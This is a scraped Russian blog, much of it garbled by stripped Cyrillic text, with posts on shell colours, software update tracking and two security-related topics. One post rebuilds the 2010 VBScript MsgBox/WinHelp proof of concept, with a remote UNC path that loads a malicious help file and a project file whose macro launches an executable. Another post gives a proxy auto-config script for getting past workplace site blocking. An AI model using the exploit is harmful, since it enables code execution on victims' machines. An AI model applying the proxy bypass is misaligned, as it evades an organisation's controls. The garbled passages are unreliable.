, 13 2010 . 18:07
+
. .
:
: , IP, - Upload SpeedTest' Yandex' . , , . , . . (CINR/RSSI) 24 dB/-54 dBm 4 dB/-93 dBm .
<a href="https://www.liveinternet.ru/users/neolitebsd/post121983350/">Уязвимость в VBScript функции MsgBox() в Microsoft Windows. От идеи до реализации.</a><br/>Утром коллега сообщил о новой уязвимости в IE связанной с VBScript. Новость была с Хабра, поэтому сразу пошел смотреть подробности: [url]http://habrahabr.ru/blogs/infosecurity/86069/[/url] редиректит нас на http://focus.ua/tech/103699 где, в сущности, нет ничего конкретного по технической стороне вопроса, что было вполне предсказуемо.
Идем на СекуЛаб и быстро находим нужное - http://www.securitylab.ru/news/391250.php. Ага!
Исследователь Maurycy Prodeus опубликовал в пятницу PoC код, демонстрирующий эксплуатацию уязвимости в VBScript функция MsgBox()
Смотрим ссылки по теме: http://www.securi... <a href="https://www.liveinternet.ru/users/neolitebsd/post121983350/">Читать далее...</a>
, 03 2010 . 10:06
+
IE VBScript. , :
http://habrahabr.ru/blogs/infosecurity/86069/ http://focus.ua/tech/103699 , , , .
-
http://www.securitylab.ru/news/391250.php . !
Maurycy Prodeus PoC , VBScript MsgBox()
:
http://www.securitylab.ru/vulnerability/391247.php ,
http://blogs.technet.com/msrc/archive/2010/02/28/i...d-internet-explorer-issue.aspx - ,
http://www.isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt - !
Proof-of-Concept is available here:
http://isec.pl/poc-isec27/
- winhlp32.exe , Calc.exe : big = "\\184.73.14.110\PUBLIC\test.hlp" =\
,
http://www.exploit-db.com/exploits/11615 :
===============================================================
A copy of test.hlp can be downloaded from here:
http://www.exploit-db.com/sploits/msgbox_test_help.zip
===============================================================
, - ! ! ?..
:
HelpScribble . .hlp
. ! , , test.hlp. - test.rtf test.hpj. - , :
[OPTIONS]
LCID=0x409 0x0 0x0
COMPRESS=0
[CONFIG]
EF("C:\\WINDOWS\\calc.exe",`',1)
[FILES]
TEST.RTF
[MAP]
21KSYK4 1
-
http://www.stcsig.org/oi/hyperviews/resources/winhelp_faq/whfaq_qa.htm
...
[3.1.8] Can I link to a URL (web site) from a help file? How?
There are a number of DLLs available for launching a web browser and displaying a web page. The DLLs are good when users don't have a default browser specified. If your users are relatively up to date, you can get away with a simple macro:
ExecFile(`http://www.mysite.net/default.html',,0,)
will usually do the trick. Both Netscape and Microsoft browsers will set up the files needed to launch a URL from the command line. The ExecFile macro just takes advantage of this capability. (Hint: From the Start menu, select Run, and then enter a URL. Click OK, and your browser should launch directly to the page you specified.)
...
- http://help.adobe.com/en_US/RoboHelp/Rword/7.0/mer...ELP_ExecFile_WinHelp_macro.htm
Help Workshop automatically converts the ExecFile macro to EF.
! =) .
<a href="https://www.liveinternet.ru/users/neolitebsd/post106448709/">Цветная консоль. Черновик</a><br/>[b]ls[/b]
Устанавливаем переменную CLICOLOR:
shell код:setenv CLICOLOR YES и переменную LSCOLORS:
shell код:setenv LSCOLORS ExGxFxdxCxDxDxhbadExEx
Где ExGxFxdxCxDxDxhbadExEx - это последовательности цветов (fb - foreground, background):
код:DIR=Ex
SYM_LINK=Gx
SOCKET=Fx
PIPE=dx
EXE=Cx
BLOCK_SP=Dx
CHAR_SP=Dx
EXE_SUID=hb
EXE_GUID=ad
DIR_STICKY=Ex
DIR_WO_STICKY=Ex
[b]grep[/b]
Устанавливаем переменные GREP_COLOR и GREP_OPTIONS:
код:setenv GREP_COLOR '1;31'
setenv GREP_OPTIONS ' --color=auto'
[b]less (man)[/b]
Устанавливаем переменные LESS_TERMCAP_xx:
код:setenv... <a href="https://www.liveinternet.ru/users/neolitebsd/post106448709/">Читать далее...</a>
, 12 2009 . 21:36
+
ls
CLICOLOR:
shell :
setenv CLICOLOR YES LSCOLORS:
shell :
setenv LSCOLORS ExGxFxdxCxDxDxhbadExEx
ExGxFxdxCxDxDxhbadExEx
- (fb - foreground, background):
:
DIR=Ex
SYM_LINK=Gx
SOCKET=Fx
PIPE=dx
EXE=Cx
BLOCK_SP=Dx
CHAR_SP=Dx
EXE_SUID=hb
EXE_GUID=ad
DIR_STICKY=Ex
DIR_WO_STICKY=Ex
grep
GREP_COLOR GREP_OPTIONS:
:
setenv GREP_COLOR '1;31'
setenv GREP_OPTIONS ' --color=auto'
less (man)
LESS_TERMCAP_xx:
:
setenv LESS_TERMCAP_mb '\033[01;31m' # begin blinking
setenv LESS_TERMCAP_md '\033[01;38;5;74m' # begin bold
setenv LESS_TERMCAP_me '\033[0m' # end mode
setenv LESS_TERMCAP_se '\033[0m' # end standout-mode
setenv LESS_TERMCAP_so '\033[38;5;246m' # begin standout-mode - info box
setenv LESS_TERMCAP_ue '\033[0m' # end underline
setenv LESS_TERMCAP_us '\033[04;38;5;146m' # begin underline
\033 ( ESC, ^E). ee (easy editor) Ctrl+O - 027.
:
http://plug-and-pray.blogspot.com/2008/02/lscolors.html
http://habrahabr.ru/blogs/linux/65857/
http://www.opennet.ru/cgi-bin/openforum/vsluhboard...rum=vsluhforumID3&omm=0&m=1l#5
<a href="https://www.liveinternet.ru/users/neolitebsd/post105870323/">Система проверки обновлений</a><br/>Компьютеры появились достаточно давно, и изначально основной их целью была автоматизация неких процессов, в частности, вычислений.
Сейчас многие забыли об этом и используют компьютеры лишь для игр и серфинга в Сети. Я давно задумывался об автоматизации различных рутинных процессов, но каждый раз написание соответствующих программ оказывалось куда более менее эффективным занятием, чем выполнение тех же операций вручную. Но вот настал день, когда что-то изменилось...
Собирать различные программы я начал еще лет с 15. Потом появился интернет, форум в локалке, где я вскоре стал модератором раз... <a href="https://www.liveinternet.ru/users/neolitebsd/post105870323/">Читать далее...</a>
, 03 2009 . 11:51
+
, , , .
. , , . , - ...
15. , , Windows Software. , . , . - .
, ( ), =), .
, , 700 . : ? =) , FTP .
, . 32- ( ) 23-. Opera, Miranda IM, Google Chrome, Your Uninstaller, AIMP2, 7-ZIp, EmEditor, K-Lite Codek Mega Codec Pack, Sony Vegas, UltraISO .
, , . :
1. .
( ), . XML .
2. -.
, , .
: , : / / .
-
http://www.neolite.ru/ftp/updates.pl
<a href="https://www.liveinternet.ru/users/neolitebsd/post104251117/">Opera Software Update System</a><br/>Я давно думал о том, чтобы написать систему управления своей коллекцией софта, но только недавно нашлось время. И первым шагом было автоматизировать проверку новых версий программ. Большинство программ не имеют встроенного механизма проверки наличия новых версий и тем более, автоматического обновления, поэтому приходилось информацию о них получать методом парсинга страниц офф. сайтов. В тоже время глупо было бы не воспользоваться имеющимися системами, учитывая что они дают куда более точную информацию о новых версиях. Итак, начнем с самого крепкого орешка - Оперы. На то, чтобы понять как работ... <a href="https://www.liveinternet.ru/users/neolitebsd/post104251117/">Читать далее...</a>
, 09 2009 . 14:16
+
<a href="https://www.liveinternet.ru/users/neolitebsd/post77030283/">Proxy Auto-Config File Format</a><br/>Вот и подошел к концу первый курс. Осталась лишь досдать сессию. Но это все лирика. Сегодня речь пойдет про .PAC файлы.
Началось все с того, что, как во на многих фирмах, нам прикрыли контакт и одноклассники. На одноклассники мне, конечно, положить, а вот контакт... Просто так с этим мириться я не собирался, тем более, что на моем сервере уже давно была поднята прокся. Какое-то время я так и сидел: периодически то переключаясь на неё, чтобы попасть ВКонтакт, и отключая, чтобы нормально работать. Не скажу, чтобы меня это сильно напрягало, но хотелась большего автоматизма: чтобы она включалас... <a href="https://www.liveinternet.ru/users/neolitebsd/post77030283/">Читать далее...</a>
, 04 2008 . 12:02
+
. . . .PAC .
, , , . , , , ... , , . - : , , , . , , : , . " URL " FF.
, , URL ? . : , FF . =) proxy.pac:
proxy.pac:
var ProxyAddress="80.92.xx.xx:ppppp";
function FindProxyForURL(url, host)
{
if (host == 'vkontakte.ru' || host == 'moikrug.ru' || host.match('odnoklassniki\.ru'))
{
return "PROXY "+ProxyAddress+"; DIRECT";
}
return "DIRECT";
}
:
http://wp.netscape.com/eng/mozilla/2.0/relnotes/demo/proxy-live.html